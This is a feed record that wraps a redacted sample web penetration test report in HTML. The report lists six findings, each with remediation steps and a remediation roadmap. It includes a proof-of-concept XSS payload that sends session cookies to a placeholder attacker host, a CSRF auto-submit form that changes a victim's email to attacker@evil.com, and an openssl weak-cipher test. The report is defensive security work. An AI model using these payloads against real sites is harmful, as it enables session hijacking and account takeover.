{"uuid": "ba399fd2-17ab-4a17-8585-f488d97852dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://gist.github.com/tejassesh5/26e63dfa642914dd0891e872144d7d4e", "content": "\n\n\n\nWeb Application Penetration Test Report \u2014 SAMPLE\n\n * { margin: 0; padding: 0; box-sizing: border-box; }\n body { font-family: 'Segoe UI', Arial, sans-serif; color: #1a1a2e; background: #fff; font-size: 13px; line-height: 1.6; }\n\n .cover { page-break-after: always; background: #0f0f1a; color: #fff; min-height: 100vh; display: flex; flex-direction: column; justify-content: space-between; padding: 60px 70px; }\n .cover-badge { font-size: 10px; letter-spacing: 3px; color: #e63946; text-transform: uppercase; font-weight: 700; margin-bottom: 8px; }\n .cover h1 { font-size: 32px; font-weight: 700; line-height: 1.2; margin-bottom: 12px; }\n .cover h1 span { color: #e63946; }\n .cover-sub { color: #aaa; font-size: 14px; margin-bottom: 40px; }\n .cover-meta table { border-collapse: collapse; }\n .cover-meta td { padding: 6px 20px 6px 0; color: #ccc; font-size: 12px; }\n .cover-meta td:first-child { color: #888; width: 170px; text-transform: uppercase; font-size: 10px; letter-spacing: 1px; }\n .cover-footer { border-top: 1px solid #333; padding-top: 20px; display: flex; justify-content: space-between; align-items: center; }\n .cover-footer .logo { font-size: 18px; font-weight: 700; color: #e63946; letter-spacing: 2px; }\n .cover-footer .conf { font-size: 10px; color: #555; letter-spacing: 2px; text-transform: uppercase; }\n\n .page { padding: 50px 70px; max-width: 900px; margin: 0 auto; }\n .page-break { page-break-before: always; }\n\n h2 { font-size: 18px; font-weight: 700; color: #0f0f1a; border-bottom: 3px solid #e63946; padding-bottom: 8px; margin: 40px 0 20px; text-transform: uppercase; letter-spacing: 1px; }\n h3 { font-size: 14px; font-weight: 700; color: #0f0f1a; margin: 24px 0 8px; }\n h4 { font-size: 12px; font-weight: 700; color: #555; text-transform: uppercase; letter-spacing: 1px; margin: 16px 0 6px; }\n p { margin-bottom: 10px; color: #333; }\n\n .toc { background: #f8f8f8; border-left: 4px solid #e63946; padding: 24px 28px; margin: 20px 0; }\n .toc-title { font-weight: 700; font-size: 13px; text-transform: uppercase; letter-spacing: 1px; margin-bottom: 14px; color: #0f0f1a; }\n .toc ol { padding-left: 18px; }\n .toc li { padding: 3px 0; color: #444; }\n\n .exec-box { background: #fff9f9; border: 1px solid #fcc; border-left: 4px solid #e63946; padding: 20px 24px; margin: 20px 0; border-radius: 4px; }\n\n .risk-summary { display: flex; gap: 12px; margin: 20px 0; flex-wrap: wrap; }\n .risk-pill { padding: 12px 20px; border-radius: 6px; text-align: center; min-width: 90px; }\n .risk-pill .count { font-size: 28px; font-weight: 700; display: block; }\n .risk-pill .label { font-size: 10px; text-transform: uppercase; letter-spacing: 1px; font-weight: 600; }\n .pill-critical { background: #2d0000; color: #ff4444; }\n .pill-high { background: #2d1000; color: #ff8c00; }\n .pill-medium { background: #2d2000; color: #ffd700; }\n .pill-low { background: #001f2d; color: #00bfff; }\n .pill-info { background: #1a1a2e; color: #aaa; }\n\n table { width: 100%; border-collapse: collapse; margin: 14px 0; }\n th { background: #0f0f1a; color: #fff; padding: 10px 14px; text-align: left; font-size: 11px; text-transform: uppercase; letter-spacing: 1px; }\n td { padding: 9px 14px; border-bottom: 1px solid #eee; color: #333; font-size: 12px; }\n tr:nth-child(even) td { background: #fafafa; }\n\n .badge { display: inline-block; padding: 2px 10px; border-radius: 20px; font-size: 10px; font-weight: 700; text-transform: uppercase; letter-spacing: 1px; }\n .badge-high { background: #ff8c00; color: #fff; }\n .badge-medium { background: #f5a623; color: #fff; }\n .badge-low { background: #00aaff; color: #fff; }\n .badge-info { background: #888; color: #fff; }\n\n .finding { border: 1px solid #e0e0e0; border-radius: 8px; margin: 24px 0; overflow: hidden; }\n .finding-header { padding: 16px 20px; display: flex; align-items: flex-start; justify-content: space-between; gap: 20px; }\n .finding-header.high { background: #fff5e6; border-bottom: 3px solid #ff8c00; }\n .finding-header.medium { background: #fffbe6; border-bottom: 3px solid #f5a623; }\n .finding-header.low { background: #e6f7ff; border-bottom: 3px solid #00aaff; }\n .finding-header.info { background: #f5f5f5; border-bottom: 3px solid #888; }\n .finding-id { font-size: 10px; color: #888; margin-bottom: 4px; font-weight: 600; letter-spacing: 1px; text-transform: uppercase; }\n .finding-title { font-size: 15px; font-weight: 700; color: #0f0f1a; }\n .finding-meta { display: flex; gap: 8px; align-items: center; margin-top: 6px; flex-wrap: wrap; }\n .finding-meta span { font-size: 11px; color: #666; }\n .cvss-score { background: #0f0f1a; color: #fff; padding: 6px 14px; border-radius: 4px; font-size: 20px; font-weight: 700; white-space: nowrap; text-align: center; min-width: 70px; }\n .cvss-score small { display: block; font-size: 9px; color: #aaa; text-transform: uppercase; letter-spacing: 1px; font-weight: 400; }\n .finding-body { padding: 20px; }\n .finding-body h4 { color: #e63946; margin-top: 14px; }\n .finding-body h4:first-child { margin-top: 0; }\n .code-block { background: #0f0f1a; color: #a8ff78; font-family: 'Courier New', monospace; padding: 14px 16px; border-radius: 4px; font-size: 11px; margin: 8px 0; overflow-x: auto; white-space: pre; }\n .rx { background: #555; color: #555; border-radius: 2px; }\n .evidence-note { background: #f0f0f0; border-left: 3px solid #ccc; padding: 10px 14px; font-size: 11px; color: #666; margin: 8px 0; border-radius: 0 4px 4px 0; font-style: italic; }\n .remed { background: #f0fff4; border: 1px solid #b7eb8f; border-left: 4px solid #52c41a; padding: 12px 16px; border-radius: 4px; margin-top: 10px; }\n .remed h4 { color: #237804; margin: 0 0 6px; }\n .remed p { color: #135200; margin: 0; font-size: 12px; }\n .watermark { text-align: center; padding: 30px; color: #ccc; font-size: 10px; letter-spacing: 2px; text-transform: uppercase; border-top: 1px solid #eee; margin-top: 40px; }\n\n\n\n\n\n\n \n\n \nConfidential — Redacted Sample\n \nWeb ApplicationPenetration TestReport\n \nOWASP Top 10 · Session Management · TLS Configuration · SOC 2 Alignment\n \n \n\n \n\n Client REDACTED CLIENT LTD \n Target Application https://app.REDACTED.com \n EnvironmentProduction (read-only scope)\n Test Period XX/XX/202X  to  XX/XX/202X \n Report Version1.0 Final\n Prepared ByTejas D. · Independent Security Consultant\n ClassificationCONFIDENTIAL — Client Eyes Only\n \n \n \n\n \nPENTEST REPORT\n \nThis document is confidential. Unauthorized distribution prohibited.\n \n\n\n\n\n\n\n1. Executive Summary\n\n\n \nAn independent web application penetration test was conducted against  REDACTED 's core business platform. Testing followed OWASP Testing Guide v4.2 and aligned with SOC 2 Type II security control requirements.\n \nSix vulnerabilities were identified: 1 High, 2 Medium, 2 Low, 1 Informational. No critical vulnerabilities were found. The most significant finding (FIND-01) allows an attacker to execute arbitrary JavaScript in an authenticated user's browser session, potentially enabling session hijacking or credential theft.\n \nAll findings include proof-of-concept evidence, CVSS v3.1 scores, and actionable remediation guidance. A retest is recommended within 30 days of remediation deployment.\n\n\n\n2. Scope & Methodology\n\n\n PhaseActivitiesDuration\n ReconnaissanceTech fingerprinting, sitemap enumeration, passive reconDay 1\n AuthenticationLogin brute-force protection, account lockout, password resetDay 1-2\n Session ManagementCookie analysis, token entropy (Burp Sequencer), fixationDay 2\n Input ValidationXSS, SQLi, XXE, SSRF across all user-controlled parametersDay 2-3\n Access ControlHorizontal/vertical privilege escalation, IDORDay 3\n Transport SecurityTLS version/cipher enumeration, HSTS, certificate validationDay 3\n Error Handling & HeadersVerbose errors, security header audit, clickjackingDay 4\n ReportDocumentation, evidence compilation, remediation guidanceDay 5\n\n\n\n3. Risk Summary\n\n\n \n0Critical\n \n1High\n \n2Medium\n \n2Low\n \n1Info\n\n\n\n IDTitleSeverityCVSS v3.1OWASP\n FIND-01Reflected XSS via Search ParameterHigh7.2A03:2021\n FIND-02CSRF: Missing Anti-Forgery TokensMedium6.1A01:2021\n FIND-03Session Cookie Missing HttpOnly/SameSiteMedium5.3A07:2021\n FIND-04TLS: Weak Cipher Suites Accepted (SWEET32)Low3.7A02:2021\n FIND-05Verbose .NET Stack Trace DisclosureLow3.1A05:2021\n FIND-06Missing HTTP Security HeadersInfo—A05:2021\n\n\n\n4. Detailed Findings\n\n\n\n \n\n \n\n \nFIND-01 · A03:2021 Injection · CWE-79\n \nReflected Cross-Site Scripting (XSS) — Search Parameter\n \nHighCVSS 7.2Affected: /search?q=\n \n \n7.2CVSS v3.1\n \n \n\n \nDescription\n \nThe q parameter on the search endpoint reflects user-supplied input directly into the HTML response without encoding. An attacker can craft a malicious URL causing arbitrary JavaScript to execute in an authenticated victim's browser session.\n \nProof of Concept\n \nGET /search?q=<script>document.location='https://[attacker]/c?d='+document.cookie</script>\nHost: app. REDACTED .com\nCookie: .ASPXAUTH= REDACTED \n \n[Evidence redacted: screenshot of alert() PoC and cookie exfiltration in test environment available on request]\n \nImpact\n \nSession token theft, credential phishing, keylogging. Combined with FIND-03 (missing HttpOnly), severity approaches Critical \u2014 attacker can extract full session cookie via document.cookie.\n \nCVSS Vector\n \nCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\n \n\nRemediation\nHTML-encode all user output via HttpUtility.HtmlEncode() or Razor built-in encoding. Implement CSP script-src 'self' as defense-in-depth. Allowlist/validate q parameter server-side. Target: 7 days.\n \n\n\n\n\n \n\n \n\n \nFIND-02 · A01:2021 Broken Access Control · CWE-352\n \nCSRF: Missing Anti-Forgery Tokens on State-Changing Requests\n \nMediumCVSS 6.1Affected: /account/update-email, /account/change-password\n \n \n6.1CVSS v3.1\n \n \n\n \nDescription\n \nThree POST endpoints modifying account state lack anti-CSRF tokens and do not validate Origin or Referer headers. Browsers automatically include session cookies in cross-origin requests.\n \nProof of Concept\n \n<!-- Attacker page -->\n<form action=\"https://app. REDACTED .com/account/update-email\" method=\"POST\">\n <input type=\"hidden\" name=\"email\" value=\"attacker@evil.com\">\n</form>\n<script>document.forms[0].submit();</script>\n \n[Burp Repeater response redacted: 200 OK confirming email changed in test account]\n \nImpact\n \nVictim visits attacker page → email changed to attacker address → password reset triggered → full account takeover. SOC 2 CC6.1 control gap.\n \n\nRemediation\nAdd [ValidateAntiForgeryToken] to all state-changing controller actions. Include @Html.AntiForgeryToken() in forms. Use synchronizer token pattern for API endpoints. Target: 14 days.\n \n\n\n\n\n \n\n \n\n \nFIND-03 · A07:2021 Auth Failures · CWE-1004\n \nSession Cookie Missing HttpOnly and SameSite Flags\n \nMediumCVSS 5.3Affected: ASP.NET_SessionId, .ASPXAUTH\n \n \n5.3CVSS v3.1\n \n \n\n \nDescription\n \nBoth session cookies lack HttpOnly and SameSite attributes. Secure flag is present. Missing HttpOnly allows JavaScript to read cookie values directly from document.cookie.\n \nEvidence\n \nSet-Cookie: ASP.NET_SessionId= REDACTED ; path=/; Secure\nSet-Cookie: .ASPXAUTH= REDACTED ; expires=...; path=/; Secure\n# HttpOnly and SameSite ABSENT from both cookies\n \nConfirmed via Burp Suite response interceptor and Chrome DevTools Application > Cookies panel.\n \nImpact\n \nChained with FIND-01 (XSS): attacker extracts session token via document.cookie, hijacks authenticated session. Without SameSite, FIND-02 (CSRF) also more effective. Combined severity Critical.\n \n\nRemediation\nIn web.config: <httpCookies httpOnlyCookies=\"true\" sameSite=\"Strict\" requireSSL=\"true\"/>. For forms auth: add cookieSameSite=\"Strict\". Verify post-deploy: IIS config and app-level settings can conflict. Target: 7 days.\n \n\n\n\n\n \n\n \n\n \nFIND-04 · A02:2021 Cryptographic Failures · CWE-326 · CVE-2016-2183\n \nTLS: Weak Cipher Suites Accepted (3DES / SWEET32)\n \nLowCVSS 3.7\n \n \n3.7CVSS v3.1\n \n \n\n \nDescription\n \nServer accepts TLS 1.2 connections using 3DES and CBC-mode AES suites without forward secrecy. TLS 1.3 is supported and preferred, but legacy suites remain negotiable.\n \nEvidence\n \n# testssl.sh:\nTLS 1.2 TLS_RSA_WITH_3DES_EDE_CBC_SHA WEAK\nTLS 1.2 TLS_RSA_WITH_AES_128_CBC_SHA WEAK (no forward secrecy)\nTLS 1.3 TLS_AES_256_GCM_SHA384 OK\n\n# Manual forced negotiation:\n$ openssl s_client -connect app. REDACTED .com:443 -cipher DES-CBC3-SHA\nCipher: DES-CBC3-SHA [connected -- not rejected]\n \n\nRemediation\nDisable legacy ciphers via IIS Crypto. Retain only: TLS_AES_256_GCM_SHA384, TLS_AES_128_GCM_SHA256 (TLS 1.3), TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (TLS 1.2). Verify with Qualys SSL Labs. Target: 30 days.\n \n\n\n\n\n \n\n \n\n \nFIND-05 · A05:2021 Security Misconfiguration · CWE-209\n \nVerbose Error Pages: .NET Stack Trace Disclosure\n \nLowCVSS 3.1Affected: multiple endpoints on malformed input\n \n \n3.1CVSS v3.1\n \n \n\n \nDescription\n \nMalformed input to integer parameters triggers full ASP.NET stack traces exposing internal namespaces, server file paths, and framework version strings.\n \nEvidence\n \nSystem.FormatException: Input string was not in a correct format.\n at  REDACTED .Controllers.ReportController.GetById(String id)\n at C:\\inetpub\\wwwroot\\ REDACTED \\Controllers\\ReportController.cs:line 47\nServer: Microsoft-IIS/10.0 ASP.NET Version: 4.8.xxxx\n \n\nRemediation\nSet customErrors mode=\"On\" in web.config with generic error pages. Add global exception handler returning sanitized responses. Remove Server and X-Powered-By response headers. Target: 14 days.\n \n\n\n\n\n \n\n \n\n \nFIND-06 · A05:2021 · CWE-693 · Informational\n \nMissing HTTP Security Headers\n \nInfoAffected: All responses\n \n \n—CVSS v3.1\n \n \n\n \n\n HeaderRecommended ValueRisk if Absent\n X-Frame-OptionsDENYClickjacking\n Content-Security-Policydefault-src 'self'XSS amplification\n Strict-Transport-Securitymax-age=31536000; includeSubDomainsSSL stripping\n X-Content-Type-OptionsnosniffMIME sniffing\n Referrer-Policystrict-origin-when-cross-originURL leakage\n \n \n\nRemediation\nAdd headers via IIS web.config under <httpProtocol><customHeaders>. Deploy CSP in report-only mode first. Verify at SecurityHeaders.com. Target: 30 days.\n \n\n\n\n5. Remediation Roadmap\n\n\n PriorityFindingEffortTargetSOC 2 Control\n P1FIND-01: XSSLow (output encoding)7 daysCC6.1, CC6.6\n P1FIND-03: Cookie FlagsLow (config change)7 daysCC6.1, CC6.7\n P2FIND-02: CSRF TokensMedium14 daysCC6.1, CC6.6\n P2FIND-05: Error DisclosureLow (config change)14 daysCC7.2\n P3FIND-04: TLS CiphersLow (IIS Crypto)30 daysCC6.7\n P4FIND-06: HeadersLow (web.config)30 daysCC6.1\n\n\nRetest recommended within 30 days of remediation deployment to verify all findings resolved prior to SOC 2 audit submission.\n\n\n6. Appendix: Tools & References\n\n\n ToolPurpose\n Burp Suite ProProxy, Intruder, Repeater, Sequencer, Scanner\n OWASP ZAP 2.14Active scan, passive analysis\n testssl.sh 3.0.9TLS/cipher enumeration\n nmap 7.94Port scan, ssl-enum-ciphers NSE script\n nikto 2.1.6Web server misconfiguration baseline\n sqlmap 1.8SQL injection verification (non-destructive)\n jwt_tool 2.2.7JWT token analysis and manipulation\n curl / httpieManual request crafting\n Chrome DevToolsCookie inspection, DOM analysis, network tab\n\n\n\nStandards referenced: OWASP Testing Guide v4.2 · OWASP Top 10 2021 · CVSS v3.1 (FIRST.org) · NIST SP 800-115 · SOC 2 TSC (AICPA 2017) · Microsoft IIS Security Best Practices\n\n\nSAMPLE REPORT — REDACTED FOR PORTFOLIO USE — CONFIDENTIAL — Prepared by Tejas D. · Independent Security Consultant\n\n\n\n", "creation_timestamp": "2026-06-23T16:29:40.000000Z"}